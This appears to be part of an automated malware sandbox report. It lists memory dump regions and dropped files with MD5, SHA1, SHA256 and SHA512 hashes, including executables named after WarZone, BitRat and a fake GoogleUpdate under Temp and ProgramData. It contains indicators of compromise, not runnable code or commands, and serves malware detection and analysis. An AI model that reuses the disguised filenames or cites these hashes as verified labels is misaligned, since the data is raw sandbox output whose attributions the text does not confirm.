memory/4924-134-0x0000000000000000-mapping.dmp
memory/4924-138-0x0000000005930000-0x0000000005F58000-memory.dmp
memory/4924-139-0x0000000005850000-0x0000000005872000-memory.dmp
memory/4924-140-0x00000000060D0000-0x0000000006136000-memory.dmp
memory/4924-141-0x00000000061B0000-0x0000000006216000-memory.dmp
memory/2416-142-0x0000000000000000-mapping.dmp
memory/2416-143-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/2416-145-0x0000000000400000-0x0000000000CD5000-memory.dmp
memory/4924-146-0x00000000066A0000-0x00000000066BE000-memory.dmp
memory/3860-147-0x0000000000000000-mapping.dmp
memory/3748-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77Install.exe
| MD5 | 2656bb680bc4b4a95ce5cb1443b2850d |
| SHA1 | 3033d5adc32e3df44205408dd3689670756e55a4 |
| SHA256 | 68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c |
| SHA512 | 59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76 |
memory/2908-150-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/212-153-0x0000000000000000-mapping.dmp
memory/3772-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/4432-160-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/4432-163-0x0000000000FB0000-0x0000000001032000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
| MD5 | eb51a99599683b7b3d47981722da5218 |
| SHA1 | e693b669e2c309869ce31f13661ba6eb3d3b0566 |
| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/3772-159-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/3980-164-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.0.cs
| MD5 | b3a0e87506914a518a26de26cc397a0b |
| SHA1 | 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3 |
| SHA256 | 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110 |
| SHA512 | 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c |
memory/4432-166-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline
| MD5 | f4e02ad531227dfde2db9e6da710c2a2 |
| SHA1 | 5d4e598721c989be975022060a01eef1992da72d |
| SHA256 | 6c4827996d73b0188f15ce978098ec336daab436babc02fcf1c1ff284fbe25a7 |
| SHA512 | 2ee6a97c948b631919a7ea65641755563b5aea426d574f166c8e1e1d7e9b07e706f9bb9898749afd8f8b9f4fbc9d100fb690ebdc6f54bcbf1511ba5747138440 |
C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/4524-168-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP
| MD5 | 8bbf0aca651a891e81c9323a8af372ee |
| SHA1 | c6ff718e14da6eb73d2733b41c0a95df9a23fc45 |
| SHA256 | 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2 |
| SHA512 | e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb |
C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp
| MD5 | bdb285fbac36bb8dbf9bae08e3ca29f9 |
| SHA1 | e9f9876f8e153eebef538ec82f62ed1cad2828c6 |
| SHA256 | bf18a49ec16c2340aa77dde24e050173bb15854c4dc04fa3fc2ce7ee3a30ed1a |
| SHA512 | e56e0e1a23915a7e4f87b61f143bd66bc479078b7505bed9e8e25f27a3872c9ff6e7defd5ec9902f243194214c205c9a606b0f263c29066534efb90bf151b052 |
memory/572-171-0x0000000000000000-mapping.dmp
memory/4260-173-0x000000000041F7B2-mapping.dmp
memory/4924-174-0x0000000006D60000-0x0000000006D92000-memory.dmp
memory/4852-175-0x0000000000000000-mapping.dmp
memory/4924-176-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
memory/4924-177-0x0000000006D40000-0x0000000006D5E000-memory.dmp
memory/4260-172-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4260-178-0x0000000004E30000-0x0000000004EC2000-memory.dmp
memory/4260-179-0x0000000005020000-0x00000000050BC000-memory.dmp
memory/4924-180-0x00000000080F0000-0x000000000876A000-memory.dmp
memory/4924-181-0x0000000007AB0000-0x0000000007ACA000-memory.dmp
memory/4432-184-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/4924-188-0x0000000007B20000-0x0000000007B2A000-memory.dmp
memory/3772-189-0x000000006FEE0000-0x000000006FF19000-memory.dmp
memory/3560-185-0x0000000000000000-mapping.dmp
memory/3772-190-0x000000006F810000-0x000000006F849000-memory.dmp
memory/3160-191-0x0000000000000000-mapping.dmp
memory/2848-183-0x0000000000000000-mapping.dmp
memory/2264-182-0x0000000000000000-mapping.dmp
memory/2436-192-0x0000000000000000-mapping.dmp
memory/4924-193-0x0000000007D30000-0x0000000007DC6000-memory.dmp
memory/3860-195-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
| MD5 | 1644f12dc1fdf3e3505fd85cc7ee2bfb |
| SHA1 | 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132 |
| SHA256 | a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7 |
| SHA512 | 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be |
C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
| MD5 | 1644f12dc1fdf3e3505fd85cc7ee2bfb |
| SHA1 | 5e5682d54ddda2f66b0bdbaf60dc90e3209cd132 |
| SHA256 | a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7 |
| SHA512 | 1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be |
memory/4668-198-0x0000000000C20000-0x0000000000C28000-memory.dmp
memory/4668-194-0x0000000000000000-mapping.dmp
memory/4668-199-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/3172-200-0x0000000000000000-mapping.dmp
memory/1436-201-0x0000000000000000-mapping.dmp
memory/4152-202-0x0000000000000000-mapping.dmp
memory/4444-204-0x0000000000000000-mapping.dmp
memory/1472-203-0x0000000000000000-mapping.dmp
memory/4924-205-0x0000000007CE0000-0x0000000007CEE000-memory.dmp
memory/3772-206-0x000000006EA90000-0x000000006EAC9000-memory.dmp
memory/4924-207-0x0000000007DF0000-0x0000000007E0A000-memory.dmp
memory/1472-208-0x0000000000910000-0x0000000000911000-memory.dmp
memory/4924-209-0x0000000007DD0000-0x0000000007DD8000-memory.dmp
memory/2264-210-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/1436-218-0x000000006FDE0000-0x000000006FE2C000-memory.dmp
memory/4668-220-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/1124-221-0x0000021DDF910000-0x0000021DDF930000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 39c9199f60a330471595859d6cdc0a6d |
| SHA1 | eb9c797cb6f892c0a77b91ff6a6337f2ce958c24 |
| SHA256 | bae534da4c46d8a9137cd8aadddf9ce6a297edc7f7e05fe9cee777a4b6221411 |
| SHA512 | 421ab0885d1b59e5705fc47912a90c546b01d7d5b5ab0b53195d5d854174e48524a73488ae80651d0b2350837f21a4070792dc1b6e4553beffa6203a931ace14 |
memory/4924-228-0x0000000007E40000-0x0000000007E62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70f94f425bc3f24106790d4c7d46b792 |
| SHA1 | e86ac9ab83476e200dc92c3be9d7b9a6792bce9b |
| SHA256 | 9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c |
| SHA512 | a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6347b5bfbd2371b20a3c0452e4030638 |
| SHA1 | ada85fe3166c6d12a8cf4358d944637aeeaad4ee |
| SHA256 | 02250982f5f910704a7c1bea8cf81bda3194dfa8aefccba1c650a72288e64ec4 |
| SHA512 | b98b4b6e9e2e0848a09b7b24ecd9fb58febcb52d04ba62eccac4ad645466c5aa550b4691b2db8fb2749d7887f30ec5a35fc64c94172f6fb896fc55ca0e86368a |
memory/1124-231-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-232-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-233-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-234-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-235-0x0000021DE200C000-0x0000021DE2010000-memory.dmp
memory/1124-237-0x0000021DDEB50000-0x0000021DDEC50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cd207fca512b968e839518ad19ec724c |
| SHA1 | 4b8ce07ccbaf935f8c6378ef49bef65158cd99ec |
| SHA256 | 80cf8c8c54d4c4625614e3db5d9a0c66cacd15565aba698aec303ca7e1c0405d |
| SHA512 | 271af571ae4dd0a090213d38538bfd2749248395a99ed8a1ec598a488cda27988d2e84e2ab7514e3a905957e36cdad69d9a7f27e15864abb7a4cc98b21f28ba3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4b2ed10cbd2d58dbbf3c50a155c3e34d |
| SHA1 | aabe7337b4253830afdf97f24a71773c7c236c6e |
| SHA256 | 5cb15d10fcd38f7f09e0a496169f451bf403d356cff9ac026a22691134ce8d4a |
| SHA512 | bd99e9dc58099d290cf7b4ed9a54038e254087459ec302b85a9dac517c10670cc383952284210c20ef4daa182bc4d8a85fcb86cd744df5e85657f120a3bb589a |
memory/3772-240-0x000000006E8D0000-0x000000006E909000-memory.dmp
memory/4092-241-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/4092-242-0x0000017BC64C0000-0x0000017BC64E2000-memory.dmp
memory/3772-243-0x0000000070210000-0x0000000070249000-memory.dmp
memory/4092-244-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp
memory/3772-245-0x0000000070210000-0x0000000070249000-memory.dmp
memory/4092-246-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp
memory/4092-247-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp
memory/2504-249-0x0000000140002300-mapping.dmp
memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2504-251-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2504-252-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp
memory/2504-253-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp
memory/408-255-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp
memory/620-254-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp